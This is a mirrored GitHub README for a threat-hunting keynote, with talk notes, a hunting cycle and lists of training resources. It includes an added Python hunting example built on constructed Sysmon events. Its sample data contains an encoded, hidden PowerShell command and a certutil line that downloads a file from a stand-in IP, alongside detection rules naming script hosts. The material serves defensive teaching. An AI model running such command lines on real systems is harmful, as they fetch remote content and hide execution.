https://github.com/ch33r10/BlueSpace2021
Ekoparty's BlueSpace Keynote November 2021. Shoutout to @plugxor Muchas Gracias!!!
- Host: GitHub
- URL: https://github.com/ch33r10/BlueSpace2021
- Owner: ch33r10
- License: mit
- Created: 2021-09-22T03:51:43.000Z (over 4 years ago)
- Default Branch: main
- Last Pushed: 2023-06-05T03:06:43.000Z (almost 3 years ago)
- Last Synced: 2024-01-29T09:42:41.866Z (about 2 years ago)
- Topics: cti, cyber-threat-hunting, cyber-threat-intelligence, hunt, hunting, threat-hunting, threat-intel, threat-intelligence
- Size: 12.8 MB
- Stars: 12
- Watchers: 1
- Forks: 2
- Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-csirt - Paint it, Blue - Transitioning from CTI to HUNT
README
# [ch33r10](https://sites.google.com/view/ch33r10/me)
PAINT IT, BLUE Slides - Link
Pro Tips on transitioning from CTI to Hunt
RESEARCH
GOAL = ASK BETTER QUESTIONS
**SOCIAL MEDIA & MORE**|**SANS**|**WORKSHOPS / TALKS**|**DISCORDS / SLACKS**
---|---|---|---
#HuntingTipOfTheDay, Follow Threat Hunting Accounts EVERYWHERE - Link|Reading Room - Link, Webcasts - Link & Threat Hunting Summit|Prioritize Threat Hunting Talks/Workshops & take a look at YouTube|Join Slack/Discord related to infosec (BlueSpace has a Discord Channel - Link)
CH33R10'S TALK NOTES EXAMPLE
I have a folder where I create a document for each conference.
I list the name of the talk or workshop and, while watching, I take screenshots of the slides (if allowed) and make notes that I can reference later. Any words in the slides that I want to make sure are searchable, I type as keywords below the slides. I grab whatever links the speaker(s) share that I can. I make sure to highlight my personal takeaways, or takeaways that I feel could be valuable for someone else. I make a point to include things I am curious about, regardless of how weird/off-the-wall/impractical my questions/thoughts may be.
TEXAS CYBER SUMMIT 2021
- Becoming a Threat Hunter: This Is One Way by Jason Wood - Link
  - LINKS
    - Crowdstrike Global Threat Report 2021 - Link
    - Crowdstrike Threat Hunting Report 2021 - Link
    - Detection Lab by Chris Long - Link
  - TALK TAKEAWAYS
    - Document your Practice
      - Record videos and publish them
      - Write up your learning experience
      - Give a conference presentation
    - Document how you hunt at work
      - Don't publish external. Keep it inside your employer
    - Benefits of documenting
      - Helps you talk about it in interviews
      - Can talk about how you've applied it at work
  - Ch33r10's RANDOM THOUGHTS & QUESTIONS
    - I wonder if it is possible to use Chris Long's Detection Lab with the tools shared in the Busting the Ghost in the Logs talk by Randy Pargman & Jean-Francois Maes during Texas Cyber Summit 2021 - Link
    - I wonder how Chris Long's Detection Lab compares with Splunk's Attack Range
    - I wonder how I can take my threat hunting practice to the next level and make my practice more organization relevant, such as tooling, telemetry, honeypots, etc.
    - I wonder if it is possible to obtain a researcher/academic license for [your organization's EDR solution/a popular EDR solution] and build a custom tailored threat hunting lab
    - For organizations that do not use Sysmon/Windows Events, how can I build threat hunting experience?
    - ETC
CH33R10'S THREAT HUNTING CYCLE
- WHAT WOULD THIS BADNESS LOOK LIKE?
- WHERE WOULD I FIND IT?
- HOW DO I DO THE NEEDFUL? (What's that search gonna look like?)
- RESEARCH - Hypothesis generation and understanding the technical details.
- ANALYSIS - Collect the necessary data, create searches, run the searches, and analyze the results.
- CONCLUSIONS - Findings, mitigations, documentation, lessons learned.
- DETECTIONS - Automate the Hunts you can.
- RINSE & REPEAT
CH33R10'S THREAT HUNTING TIPS
THREAT HUNT TYPE
- STRUCTURED: Known TTPs, IOCs, Artifacts
- UNSTRUCTURED: Unknown
- INTERNAL vs. EXTERNAL - Example: Cobalt Strike Beacon Hunting in Network vs. ITW (In the Wild)
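The cycle and the hunt types above, as an added example that is not part of ch33r10's README or the keynote: a structured hunt (known TTP and known IOC as per-event predicates) and an unstructured hunt (stack-counting parent/child process pairs and reviewing the long tail) run over constructed Sysmon-style Event ID 1 (process creation) records, with the structured predicates reused as streaming detections (the DETECTIONS step). Everything in it is an assumption for illustration: the hosts, users and command lines, the hypothetical IOC list and the 198.51.100.7 (TEST-NET-2) address, the Office-spawns-script-host hypothesis, and the encoded-PowerShell decoder used at the ANALYSIS step.

```python
import base64
import re
from collections import Counter
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    """The handful of Sysmon Event ID 1 (process creation) fields the hunt needs."""
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


# Constructed sample telemetry (not real data). Hosts, users, the 198.51.100.7
# address (TEST-NET-2 documentation range) and the command lines are made up.
W = r"C:\Windows"
O = r"C:\Program Files\Microsoft Office\root\Office16"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
EVENTS = [
    ProcessEvent("ws01", "alice", W + r"\explorer.exe", O + r"\WINWORD.EXE", '"WINWORD.EXE" Q3-report.docx'),
    ProcessEvent("ws01", "alice", O + r"\WINWORD.EXE", W + r"\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc dwBoAG8AYQBtAGkA"),  # base64 of UTF-16LE "whoami"
    ProcessEvent("ws02", "bob", W + r"\explorer.exe", CHROME, "chrome.exe"),
    ProcessEvent("ws03", "carol", W + r"\explorer.exe", O + r"\WINWORD.EXE", '"WINWORD.EXE" notes.docx'),
    ProcessEvent("ws03", "carol", W + r"\System32\services.exe", W + r"\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ProcessEvent("ws01", "alice", W + r"\System32\services.exe", W + r"\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ProcessEvent("ws02", "bob", W + r"\System32\services.exe", W + r"\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ProcessEvent("ws04", "dave", W + r"\explorer.exe", CHROME, "chrome.exe"),
    ProcessEvent("ws04", "dave", W + r"\explorer.exe", W + r"\System32\cmd.exe", "cmd.exe"),
    ProcessEvent("ws04", "dave", W + r"\System32\cmd.exe", W + r"\System32\certutil.exe",
                 "certutil.exe -urlcache -split -f http://198.51.100.7/u.txt u.txt"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
IOC_STRINGS = {"198.51.100.7"}  # hypothetical indicator lifted from a (constructed) CTI report


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path, so WINWORD.EXE and winword.exe stack together."""
    return path.rsplit("\\", 1)[-1].lower()


# --- STRUCTURED hunt: known TTP / known IOC, each written as a per-event predicate ---
def office_spawns_script_host(e: ProcessEvent) -> bool:
    """Hypothesis: a malicious document makes an Office app launch a script host."""
    return basename(e.parent_image) in OFFICE_APPS and basename(e.image) in SCRIPT_HOSTS


def matches_ioc(e: ProcessEvent) -> bool:
    """Hypothesis: a known-bad indicator appears in a command line."""
    return any(ioc in e.command_line for ioc in IOC_STRINGS)


def structured_hunt(events: Iterable[ProcessEvent],
                    predicate: Callable[[ProcessEvent], bool]) -> List[ProcessEvent]:
    """Run a known-badness predicate over historical telemetry (the retrospective hunt)."""
    return [e for e in events if predicate(e)]


# --- UNSTRUCTURED hunt: no attacker hypothesis, only "what is rare across the fleet?" ---
def rare_parent_child_pairs(events: Iterable[ProcessEvent],
                            max_count: int = 1) -> Dict[Tuple[str, str], int]:
    """Stack-count (parent, child) image pairs and return the long tail for analyst review."""
    counts = Counter((basename(e.parent_image), basename(e.image)) for e in events)
    return {pair: n for pair, n in counts.items() if n <= max_count}


# --- ANALYSIS helper: decode an encoded PowerShell command line during triage ---
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_powershell(command_line: str) -> Optional[str]:
    """Return the UTF-16LE payload behind -enc/-EncodedCommand, or None if absent/invalid."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# --- DETECTIONS: the hunt predicates become rules evaluated on every new event ---
RULES: Dict[str, Callable[[ProcessEvent], bool]] = {
    "office_spawns_script_host": office_spawns_script_host,
    "cti_ioc_match": matches_ioc,
}


def detect(e: ProcessEvent) -> List[str]:
    """Names of the automated rules that fire on a single incoming event."""
    return [name for name, rule in RULES.items() if rule(e)]


if __name__ == "__main__":
    for e in structured_hunt(EVENTS, office_spawns_script_host):
        print("TTP hit:", e.host, e.user, e.command_line, "->", decode_encoded_powershell(e.command_line))
    for e in structured_hunt(EVENTS, matches_ioc):
        print("IOC hit:", e.host, e.user, e.command_line)
    for pair, n in rare_parent_child_pairs(EVENTS).items():
        print("rare pair (needs analyst review):", pair, n)
```

The two structured predicates each return exactly one event; the unstructured stack returns three rare pairs, one of which (explorer.exe spawning cmd.exe) is benign noise, which is the point: an unstructured hunt produces candidates for an analyst, while a structured hypothesis that held up can be promoted unchanged into the `RULES` table and run on live events.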
LEARNING RESOURCES
CHEATSHEETS
- Malware Archaeology Cheatsheets - Windows - Link 1, Link 2, Backup copy for Link 2 - Link 3
- Olaf Hartong. Sysmon Cheatsheet - Link
- SANS Hunt Evil Poster - Link
- SANS Intrusion Discovery for Windows Cheatsheet - Link
DETECTIONS/HUNTS
- BlueTeamLabs - Azure Sentinel Hunting Resource - Link
- David J. Bianco. Threat Hunting Project - Threat Hunts - Link
- Detection Ideas Repo by Vadim Khrykov @BlackMatter23 - Link
- Hurricane Labs - Threat Hunting with Splunk: Part 2, Process Creation Log Analysis - Link
- Roberto Rodriguez. ThreatHunter Playbook - Link
- Sigma Rules - Link
- Splunk - Advanced Threat Detection and Response - Link
- YARA Rules Resource - Link
- BLOG: BC Security Offensive Security Tools - Link
- BLOG: Red Canary - Link
- BLOG: SCYTHE Threat Thursday - Link
- BLOG: SpecterOps - Link
GENERAL INFO
- Ch33r10's PURPLE TEAM EXERCISE IDEA QUEUE W/ THREAT HUNTING SUGGESTIONS - Link
- Ch33r10's Twitter Threat Hunting List - Link
- C2 Matrix by Jorge Orchilles, Bryson Bort & Adam Mashinchi - Link
- C2 Matrix Slingshot VM with C2s Pre-Installed + VECTR by SANS Institute - Link
- DEMO: C2 Matrix VM Walkthru with Jorge Orchilles - Link
- David J. Bianco and Cat Self. SANS Threat Hunting & IR Europe Summit 2020 - Link
- David J. Bianco. Sqrrl Archive - Link
- David J. Bianco. The Pyramid of Pain - Link
- David J. Bianco. The Threat Hunt Project - Analysis Environment - Link
- David J. Bianco. The ThreatHunting Project - Recommended Reading List - Link
- Digit Oktavianto. Cyber Threat Hunting Workshop - Link
- iRed Team - Link
- Jason Wood. Becoming a Threat Hunter: This Is One Way - Texas Cyber Summit 2021 - Link
- Jennifer Gruener. DIY Splunk - Link
- Joshua Stevens. Hunting for the Undefined Threat: Advanced Analytics & Visualization. RSA Conference 2015 - Link
- Matt Bromiley. Thinking like a Hunter: Implementing a Threat Hunting Program. SANS Analyst Paper - Link
- MITRE ENGENUITY - ATT&CK Evaluations - Link
- Robert M. Lee and David J. Bianco. Generating Hypotheses for Successful Threat Hunting. SANS Analyst White Paper - Link
- Roberto Rodriguez. How Hot is your Hunt Team? - Link
- Splunk - Threat Hunting with Splunk: The Basics - Link
- Sqrrl. A Framework for Cyber Threat Hunting - Link 1, Backup copy for Link 1 - Link 2
- The DFIR Report - Link
- Valentina Costa-Gazcon. Practical Threat Intelligence and Data-Driven Threat Hunting - Link
INTERVIEW RESOURCES
- Questions for Infosec Job Twitter Thread - Link
- Questions to Find RED FLAGS at a Company Twitter Thread - Link
- Questions to Prepare for Trait-based Interview Questions Twitter Thread - Link
SANS THREAT HUNTING
- SANS THREAT HUNTING PLAYLIST - Link
- SANS THREAT HUNTING SUMMIT 2021 Links from the chats collected by Cassie @DFIRDetective - Link
- SANS THREAT HUNTING SUMMIT 2020 - Link
- SANS THREAT HUNTING & INCIDENT RESPONSE SUMMIT 2019 - Link
- SANS THREAT HUNTING & INCIDENT RESPONSE SUMMIT 2018 - Link
- SANS THREAT HUNTING & INCIDENT RESPONSE SUMMIT 2017 - Link
TRAINING
- Active Countermeasures - Cyber Threat Hunting Training - Cost: FREE - Link
- Applied Network Defense - Practical Threat Hunting - Cost: paid - Link
- BlueTeamLabsOnline - Cost: paid - Link
- CyberDefenders - Windows Threat Hunting and others - Cost: FREE & paid - Link
- Detection Lab by Chris Long - Cost: FREE - Link
- INE elearnsecurity - Threat Hunting - Cost: paid - Link
- Mosse Institute - Certified Threat Hunter - Cost: paid - Link
- SANS FOR508 Advanced Incident Response, Threat Hunting, and Digital Forensics - Cost: paid - Link
- Splunk Attack Range - Cost: FREE - Link
- Splunk's Boss of the SOC (BOTS) - Cost: FREE - BOTS v1, BOTS v2, BOTS v3
- Splunk Workshops - Cost: FREE - Link
I took a screenshot of Jason Wood's slide for my personal notes and retyped it in the TALK TAKEAWAYS above. These are his words on the slide that I duplicated. All credit for the words on the slide goes to Jason Wood. This duplication is for educational purposes.
PRACTICE
GOAL = PREPARATION
**TRAININGS / HANDS-ON**|**GIVE A TALK**|**HUNT HYPOTHESIS DEV**|**WORK PROJECTS**
---|---|---|---
Boss of the SOC (BOTS) - BOTS v1, BOTS v2, BOTS v3, ATTACK Range - Link, SPLUNK, .conf Talks, SPLUNK Workshops|Talk about something HUNT adjacent|Read Threat Reports & Think about how YOU would HUNT it, Understand the Technical Attack Chain|Volunteer to work SOC tickets, Volunteer to prep CTI reports for HUNT/PURPLE
CH33R10'S HUNT HYPOTHESIS DEV
APPLY
GOAL = APPLICATION
**MITRE ATT&CK TECHNIQUES**|**CISA / PUBLIC THREAT REPORTS**|**INFOSEC CURRENT EVENTS**
---|---|---
Pick a few and be able to explain them in DETAIL - MITRE ATT&CK|Develop Hunt Hypotheses with a minimum of 1 hour of content to discuss|Develop hunt scenarios & understand the technical attack chain
Section headings of the collapsed README blocks above, in order: CH33R10'S THREAT HUNTING CYCLE; CH33R10'S THREAT HUNTING TIPS; LEARNING RESOURCES (CHEATSHEETS, DETECTIONS/HUNTS, GENERAL INFO, INTERVIEW RESOURCES, SANS THREAT HUNTING, TRAINING).
THANK YOU
Thank you to BlueSpace and Ekoparty! <3
Shoutout to @plugxor Muchas Gracias!